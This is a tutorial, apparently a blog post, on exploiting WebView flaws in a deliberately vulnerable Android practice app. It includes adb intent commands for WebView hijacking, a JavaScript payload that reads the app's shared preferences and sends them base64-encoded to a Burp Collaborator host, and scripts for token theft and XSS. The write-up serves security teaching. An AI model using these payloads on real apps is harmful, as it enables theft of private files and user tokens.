What is WebView?
The WebView
class is an extension of Android's View
class that allows you to display web pages as a part of your activity layout. It does not include any features of a fully developed web browser, such as navigation controls or an address bar. All that WebView
does, by default, is show a web page.
For testing, we will be using the vulnerable webview application to learn how to manually exploit the webview’s in android application. Credentials for the login is username:vuln and password:webview (in case if we need.)
WebViews are Exported
Before getting into the vulnerability, we need to make sure that WebViews are part of our target application.
Since WebViews are part of the activities in an application, we need to de-compile an apk to go through AndroidManifest.xml file and the application’s Activities to check for the presence of vulnerable WebView.
Let us first load our application into the Jadx de-compiler to analyze the manifest and activities.
Now, we will see which are the components that are exported. we can conclude that a component is exported in 2 ways.
- If component explicitly declares the “exported=true” attribute
- If the component has intent filters & no “exported=false” attribute
some of the components SupportWebView, RegistrationWebView are explicitly exported and MainActivity is exported by mentioning intent filters by which we can confirm that WebViews are being used by the application.
We can see that the function loadWebView,it is loading the url by getting the string from intent.
So this behavior can be exploited by third party applications by sending an intent to this component with a url string and the target application will accept and execute as this component has been exported. i.e., third party application have access to webview component in target application.
Exploitation
We will use ADB to send an intent to the component and this intent will open a malicious webpage provided by the attacker within the context of the application.
adb shell am start -n componentname --es string "domain.com"
adb shell to start unique shell on a device, am (activity manager) start, -n name of the component, — es extra string followed by the url.
So our adb cmd will look like as follows:
adb shell am start -n com.tmh.vulnwebview/.RegistrationWebView --es reg_url "https://3kal.medium.com"
NOTE: The above way works only if the component is directly exported and this doesn’t work for component exported by intent filter.
setAllowUniversalAccessFromFileURLs enabled for WebView
Another setting that the developer can configure is allowing JavaScript running within the context of file scheme URL to access content from any origin including other file scheme URLs.
This setting removes all same origin policy restrictions & allows the webview to make requests to the web from the file which is normally not possible. i.e., Attacker can read local files using java script and send them across the web to a attacker controlled domain.
If the WebView is exported, this behavior can be very dangerous because it can allow the attacker to read arbitrary files which may be private to the application.
Exploitation
Now let us see how to exploit this setting which has been used in the above application.
Now, let us create the exploit for the vulnerability in java script as discussed in the vulnerability details.
I have used my burp collaborator link to get the content, you can use whichever is handy for you.
<script>
var url = 'file:///data/data/com.tmh.vulnwebview/shared_prefs/MainActivity.xml'; //local filefunction load(url) {
var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
fetch('https://8ktm71h4wjnqo72wgqbzvnr7jypodd.burpcollaborator.net/?exfiltrated=' + btoa(xhr.responseText)); //send b64 encoded file to attacker
}
}xhr.open('GET', url, true);
xhr.send('');
}load(url)
</script>
Add the above code to sauafu.html and move the file to the sdcard using adb.
Exploit loads the content of the local file and returns it to the attacker url.
Now run the intent with exploit file.
adb shell am start -n com.tmh.vulnwebview/.RegistrationWebView --es reg_url "file:///sdcard/sauafu.html"
Now we should have received file contents encoded in base 64 in the burp collaborator or whatever you used.
We can see the decoded contents of the file which was received in base 64 encoded on the right window box.
JavaScript Enabled with Interface for WebView
Developers can enable java script in the webview by adding this configuration
webView.getSettings().setJavaScriptEnabled(true);
Adding this configuration creates an interface between the webpage’s java script and the client side java code of the application. i.e., the web page’s java script can access and inject java code into the application.
webView.addJavascriptInterface(new WebAppInterface(this), "Android");
if this activity is exported, this can be dangerous and allows an attacker to carry out many attacks including XSS and stealing tokens from the application.
Exploitation
For Exploitation of this scenario, we cannot make use of the same web View as above since it doesn’t make use of interface. Hence, we will use some other webView which has used the interface.
we can use support webview as you can see that java script has been enabled along with the use of the interface with the name Android.
<script type="text/javascript">
document.write("token: " + Android.getUserToken());
</script>
This script writes the token by generating from the getUserToken() Method from the Android object which was the name of the interface.
Host this script from the apache server and connect port 80 to ngrok to get https link (http links cannot be used).
sudo service apache2 start
./ngrok http 80and use https ngrok linkadb shell am start -n com.tmh.vulnwebview/.Supportwebview --es support_url "https://8d95c0fe086f.ngrok.io/token.html"
We can show XSS alert just by replacing the document.write line in the above javascript code with your favorite xss payload.
<script type="text/javascript">
alert("kal");
</script>
We have covered 4 Vulnerabilities related to WebViews
- Exported WebView (WebView Hijacking)
- Universal File access from file is enabled for WebView (File Theft)
- Use of setJavaScript Enabled(XSS)
- Javascript Interface (token stealing)
Note: Most was taken as is from Farah Hawa’s Video in youtube. All credits goes to her, if you like the content then please watch the video and like it.